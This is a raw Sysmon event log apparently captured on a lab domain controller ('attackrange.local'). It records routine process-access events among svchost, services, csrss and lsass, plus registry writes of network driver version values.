13:53:05.305{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000983Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.305{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000982Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.305{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000981Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.290{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000980Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.290{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000979Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.290{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000978Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.290{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000977Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.290{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000976Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.290{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000975Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.290{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x8000000000000000974Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.274{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000973Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.274{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000972Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.274{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000971Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.274{10ACEC4A-853E-5FCF-0A00-000000009101}8521128C:\Windows\system32\services.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000970Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.274{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000969Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.258{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000968Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.258{10ACEC4A-853E-5FCF-0A00-000000009101}852944C:\Windows\system32\services.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000967Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.258{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000966Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.258{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000965Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.258{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000964Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.258{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\rspndr\DriverMinorVersionDWORD (0x00000000) 13241300x8000000000000000963Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.258{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\rspndr\DriverMajorVersionDWORD (0x00000000) 13241300x8000000000000000962Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.258{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\rspndr\NdisMinorVersionDWORD (0x0000001e) 13241300x8000000000000000961Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.258{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\rspndr\NdisMajorVersionDWORD (0x00000006) 13241300x8000000000000000960Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.258{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\DriverMinorVersionDWORD (0x00000000) 13241300x8000000000000000959Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.258{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\DriverMajorVersionDWORD (0x0000000a) 13241300x8000000000000000958Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.258{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\NdisMinorVersionDWORD (0x0000001e) 13241300x8000000000000000957Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.258{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\NdisMajorVersionDWORD (0x00000006) 13241300x8000000000000000956Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.243{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\lltdio\DriverMinorVersionDWORD (0x00000000) 13241300x8000000000000000955Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.243{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\lltdio\DriverMajorVersionDWORD (0x00000000) 13241300x8000000000000000954Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.243{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\lltdio\NdisMinorVersionDWORD (0x0000001e) 13241300x8000000000000000953Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.243{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\lltdio\NdisMajorVersionDWORD (0x00000006) 10341000x8000000000000000952Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.243{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000951Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.243{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000950Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.227{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000949Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 